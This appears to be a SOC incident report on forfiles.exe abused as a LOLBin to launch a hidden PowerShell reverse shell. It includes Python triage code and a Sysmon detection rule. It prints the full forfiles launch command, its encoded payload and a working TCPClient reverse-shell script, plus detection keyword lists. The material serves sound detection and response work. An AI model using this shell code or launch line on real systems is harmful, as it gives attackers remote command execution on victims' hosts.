Sysmon Alert Details
Alert ID: SYSMON-INDIRECT-1202-7842
Alert Time: 2024-02-19 10:30:15 EST
Severity: HIGH (82/100)
Source: Sysmon (Event ID 1 – Process Creation)
Rule: "Indirect Command Execution via Forfiles.exe"
MITRE ATT&CK: T1202 – Indirect Command Execution
Alert Details:
Event ID: 1 (Process Creation)
Time: 10:25 EST
Host: ENG-WS-034 (Engineering Workstation)
User: rpatel (Raj Patel, Engineer)
Process Tree:
explorer.exe (PID: 2341)
    cmd.exe (PID: 4789)
        forfiles.exe (PID: 4792)
Command: forfiles /p C:\Windows\System32 /m notepad.exe /c "cmd /c powershell -WindowStyle Hidden -EncodedCommand JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQA5ADIALgAxADYAOAAuADMANAAuADUANgAnACwANAA0ADMAKQA7AA=="
Detection Logic:
forfiles.exe used to execute a command via its /c argument (indirect execution); the matched file is never referenced
The /c command launches PowerShell hidden (-WindowStyle Hidden) with a base64/UTF-16LE -EncodedCommand reverse shell
forfiles.exe is a signed Microsoft binary in System32 (living off the land), so it passes default AppLocker/WDAC allow rules
Pattern matches the documented LOLBin technique (forfiles.exe is listed on LOLBAS as an indirect command launcher): the extra process hop separates powershell.exe from the process that really launched it
Decoded PowerShell Command:
$client = New-Object System.Net.Sockets.TCPClient('192.168.34.56',443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()
};
$client.Close()
Additional Context:
forfiles.exe used to indirectly execute PowerShell
C2 IP: 192.168.34.56 (internal)
User rpatel had previously clicked a phishing link
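The detection logic and the decoding step above, as an added worked example that is not part of the report or of any vendor tooling: the Python below scores Sysmon Event ID 1 records for forfiles.exe used as a launcher (an interpreter named in /c, no use of forfiles' @file variables, an -EncodedCommand present) and decodes the base64/UTF-16LE payload to pull out the C2 endpoint. The sample records are constructed; the first reuses the alert's own encoded string, the second (hypothetical host BLD-SRV-01, a routine log cleanup) is a benign case included to show the rule does not fire on normal forfiles use. Scores and the alert threshold are illustrative choices.

```python
"""Triage Sysmon Event ID 1 (process creation) records for forfiles.exe abused as a
command launcher (T1202), and decode any -EncodedCommand payload it carries."""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Interpreters that have no business inside a forfiles /c argument on a workstation.
LAUNCHER_RE = re.compile(
    r"\b(powershell|pwsh|mshta|wscript|cscript|rundll32|regsvr32|certutil|bitsadmin)(\.exe)?\b",
    re.IGNORECASE)
# forfiles requires its /c command to be double-quoted; capture the quoted text.
FORFILES_C_RE = re.compile(r'/c\s+"([^"]*)"', re.IGNORECASE)
# forfiles variables; a /c command that uses none of them is not operating on files.
FILE_VAR_RE = re.compile(r"@(file|fname|ext|path|relpath|isdir|fsize|fdate|ftime)\b", re.IGNORECASE)
# powershell.exe accepts -e, -ec, -enc and -EncodedCommand for the same switch.
ENCODED_RE = re.compile(r"-e(?:c|nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# Decoded-payload strings typical of reverse shells and stagers.
PAYLOAD_INDICATORS = ("TCPClient", "GetStream", "iex", "Invoke-Expression",
                      "DownloadString", "Net.WebClient")
C2_RE = re.compile(r"TCPClient\(\s*['\"]([\d.]+)['\"]\s*,\s*(\d+)\s*\)")
ALERT_THRESHOLD = 50  # illustrative

# Constructed sample records (a subset of Sysmon EID 1 fields); not real telemetry.
# The first CommandLine reuses the alert's own -EncodedCommand string.
SAMPLE_EVENTS = [
    {"Host": "ENG-WS-034", "User": "rpatel", "Image": r"C:\Windows\System32\forfiles.exe",
     "CommandLine": r'forfiles /p C:\Windows\System32 /m notepad.exe /c "cmd /c powershell '
                    r'-WindowStyle Hidden -EncodedCommand JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQA5ADIALgAxADYAOAAuADMANAAuADUANgAnACwANAA0ADMAKQA7AA=="'},
    # Hypothetical benign use: a build server deleting logs older than 30 days.
    {"Host": "BLD-SRV-01", "User": "svc_build", "Image": r"C:\Windows\System32\forfiles.exe",
     "CommandLine": r'forfiles /p D:\builds\logs /s /m *.log /d -30 /c "cmd /c del @path"'},
    {"Host": "ENG-WS-034", "User": "rpatel", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r'"C:\Windows\System32\notepad.exe" notes.txt'},
]


@dataclass
class Finding:
    host: str
    user: str
    score: int = 0
    reasons: List[str] = field(default_factory=list)
    decoded: Optional[str] = None
    c2: Optional[Tuple[str, int]] = None

    @property
    def alert(self) -> bool:
        return self.score >= ALERT_THRESHOLD


def decode_encoded_command(b64: str) -> Optional[str]:
    """-EncodedCommand is base64 over UTF-16LE text, so a UTF-8 decode would be wrong."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_event(ev: dict) -> Optional[Finding]:
    """Score one EID 1 record; returns None for anything that is not forfiles.exe."""
    if not ev["Image"].lower().endswith("\\forfiles.exe"):
        return None
    f = Finding(ev["Host"], ev["User"])
    m = FORFILES_C_RE.search(ev["CommandLine"])
    cmd = m.group(1) if m else ""
    if LAUNCHER_RE.search(cmd):
        f.score += 40
        f.reasons.append("/c launches a script interpreter")
    if not FILE_VAR_RE.search(cmd):
        f.score += 10
        f.reasons.append("/c ignores the matched file (forfiles used purely as a launcher)")
    enc = ENCODED_RE.search(cmd)
    if enc:
        f.score += 30
        f.reasons.append("-EncodedCommand present")
        f.decoded = decode_encoded_command(enc.group(1))
        if f.decoded:
            hits = [i for i in PAYLOAD_INDICATORS
                    if re.search(r"\b" + re.escape(i) + r"\b", f.decoded, re.IGNORECASE)]
            if hits:
                f.score += 20
                f.reasons.append("decoded payload contains " + ", ".join(hits))
            c2 = C2_RE.search(f.decoded)
            if c2:
                f.c2 = (c2.group(1), int(c2.group(2)))
    f.score = min(f.score, 100)
    return f


def triage(events: List[dict]) -> List[Finding]:
    """Run triage over a batch of records, dropping non-forfiles events."""
    return [f for f in (triage_event(e) for e in events) if f is not None]


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print("ALERT" if finding.alert else "info ", finding.host, finding.user,
              "score=%d c2=%s %s" % (finding.score, finding.c2, finding.reasons))
        if finding.decoded:
            print("  decoded:", finding.decoded)
```

The decode step is what step 2 of the investigation below did by hand in CyberChef; the benign record scores zero because its /c command acts on @path and names no interpreter, which is the distinction a production rule needs to avoid paging on routine cleanup jobs. Note that the alert's encoded string decodes to only the first statement of the reverse shell; the full script shown above was recovered from the session itself.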
SOC Investigation Process
Step | Action | Tools Used | Findings
1. Alert Validation | Verify Sysmon events | Splunk, Sysmon logs | Confirmed indirect command execution via forfiles.exe
2. Command Decoding | Decode -EncodedCommand (base64 over UTF-16LE) | CyberChef | Reverse shell to 192.168.34.56:443
3. Process Investigation | Identify source of command | CrowdStrike | Malicious script downloaded earlier
4. Immediate Action | Terminate reverse shell | CrowdStrike | PowerShell process killed
5. C2 Investigation | Identify 192.168.34.56 | CMDB, CrowdStrike | Internal engineering host (already compromised)
6. Host Isolation | Isolate both hosts | CrowdStrike | Both hosts quarantined
Jira Incident Report
Ticket: SOC-2024-100
Summary: T1202 – Indirect Command Execution via Forfiles.exe for Reverse Shell
Status: RESOLVED
Resolution: MALICIOUS – Reverse Shell Terminated
Priority: P2 – MEDIUM
Labels: T1202, indirect-command, forfiles, lolbin, sysmon, reverse-shell
Components: Endpoint-Security, Defense-Evasion
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Sysmon Event ID 1 (Process Creation).
Alert: “Indirect Command Execution via Forfiles.exe”.
Host: ENG-WS-034 (Engineering Department, user rpatel).
Time: 2024-02-19 10:30 EST.
Technique: MITRE ATT&CK T1202 – Indirect Command Execution.
2. Technical Analysis:
Attack Chain:
09:45 – User clicked phishing link in email
09:46 – PowerShell downloaded and executed initial script
09:47 – Script downloaded Cobalt Strike beacon
09:48 – Beacon injected into svchost.exe
09:50 – Attacker used beacon to launch indirect command
10:25 – forfiles.exe executed with malicious command
10:25 – PowerShell reverse shell to internal C2
10:30 – Splunk rule fires on the Sysmon Event ID 1 record for forfiles.exe
Indirect Execution Technique:
Binary: forfiles.exe (legitimate, signed Windows tool in System32)
Purpose: selects files by path (/p), mask (/m) and age (/d) and runs a command (/c) once per match; the default command is "cmd /c echo @file"
Abuse: /c runs any quoted command; /m notepad.exe against C:\Windows\System32 guarantees exactly one match, so the payload runs once and the file variables (@file, @path) are never referenced
Why: default AppLocker rules allow everything under %WINDIR%, so forfiles.exe, cmd.exe and powershell.exe all pass, and the extra hop (forfiles.exe -> cmd.exe -> powershell.exe) separates powershell.exe from the process that really launched it
Command: launches a hidden PowerShell (-WindowStyle Hidden) whose base64/UTF-16LE -EncodedCommand is a reverse shell
C2 Infrastructure:
Internal C2: 192.168.34.56:443 (ENG-WS-089)
External C2: 185.143.221[.]89 (from ENG-WS-089 host logs)
Chain: ENG-WS-034 -> ENG-WS-089 -> External
Reverse Shell Capabilities:
Interactive PowerShell session
Full command execution
File upload/download
No data exfiltration before termination
3. Investigation Findings:
Timeline:
09:45 – Phishing email opened
09:46-09:48 – Malware installation
10:25 – Indirect command execution
10:30 – Sysmon alert
10:32 – SOC investigates
10:35 – Reverse shell terminated
10:36 – Both hosts isolated
Indicators of Compromise (IoCs):
Process:
– forfiles.exe /p C:\Windows\System32 /m notepad.exe /c "cmd /c powershell -WindowStyle Hidden -EncodedCommand JABjAGwAaQ…
Network:
– Internal C2: 192.168.34.56:443
– External C2: 185.143.221[.]89
Files:
– Initial dropper (SHA256: a1b2c3d4…)
4. Containment Actions:
Immediate Actions:
Terminated reverse shell process.
Isolated ENG-WS-034.
Isolated ENG-WS-089 (C2 host).
Blocked external C2 at firewall.
Malware Removal:
Terminated the svchost.exe processes hosting the injected beacon on both hosts.
Deleted malicious files.
Full scans (clean).
User Remediation:
Password reset for rpatel.
Phishing training assigned.
5. Root Cause Analysis:
Primary Cause: User clicked phishing link.
Contributing Factors:
AppLocker allowed forfiles.exe (legitimate binary).
PowerShell allowed to execute for a standard user, including -EncodedCommand payloads.
No monitoring for LOLBin abuse.
6. Business Impact:
Operational Impact: Two engineering workstations offline for 2 hours.
Data Exposure: None (C2 contained).
7. Remediation & Prevention:
Completed Actions:
Reverse shell terminated.
Malware removed.
Hosts secured.
C2 blocked.
Technical Controls Enhanced:
Created Sysmon rule for forfiles.exe with suspicious command lines.
Enhanced monitoring for LOLBin abuse.
Restricted PowerShell execution policy (caveat: the execution policy governs script files only and is not a security boundary; an -EncodedCommand payload like this one is unaffected, so Constrained Language Mode or AppLocker/WDAC script rules are the controls that would actually block a repeat).
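The Sysmon rule named in the controls above, written out as an added example; this is not the configuration from the report, and the schema version, rule group name and rule names are assumptions. It records Event ID 1 whenever forfiles.exe starts with a command line naming a script interpreter or an encoded command, and stamps the event with a RuleName the SIEM can key on. Sysmon only logs; the alert itself still comes from the Splunk rule.

```xml
<Sysmon schemaversion="4.90">
  <EventFiltering>
    <RuleGroup name="T1202 forfiles launcher" groupRelation="or">
      <ProcessCreate onmatch="include">
        <!-- forfiles.exe whose /c command names an interpreter or an encoded
             command instead of acting on the matched files. Sysmon string
             conditions are case-insensitive; "contains any" takes a ;-list. -->
        <Rule name="forfiles_indirect_exec" groupRelation="and">
          <Image condition="end with">\forfiles.exe</Image>
          <CommandLine condition="contains any">powershell;pwsh;mshta;wscript;cscript;rundll32;regsvr32;certutil;bitsadmin;-enc;-EncodedCommand</CommandLine>
        </Rule>
        <!-- Variant with no cmd.exe hop: powershell.exe spawned directly by
             forfiles.exe. In this incident cmd.exe sat between the two, so the
             rule above is the one that would have fired. -->
        <Rule name="forfiles_child_powershell" groupRelation="and">
          <Image condition="end with">\powershell.exe</Image>
          <ParentImage condition="end with">\forfiles.exe</ParentImage>
        </Rule>
      </ProcessCreate>
    </RuleGroup>
  </EventFiltering>
</Sysmon>
```

Pair this with PowerShell Script Block Logging (Event ID 4104), which records the decoded script at execution time and removes the manual CyberChef step from future triage.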
8. Conclusion:
An attacker used forfiles.exe, a legitimate Windows binary, to indirectly execute a PowerShell reverse shell, passing application controls that trust signed Windows binaries. The Sysmon process-creation event for forfiles.exe exposed the full command line, including the encoded payload, enabling rapid decoding and termination. The reverse shell was active for about 10 minutes (10:25 to 10:35) before containment.
Closure Rationale: Reverse shell terminated; malware removed; LOLBin monitoring enhanced.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-19 11:30 EST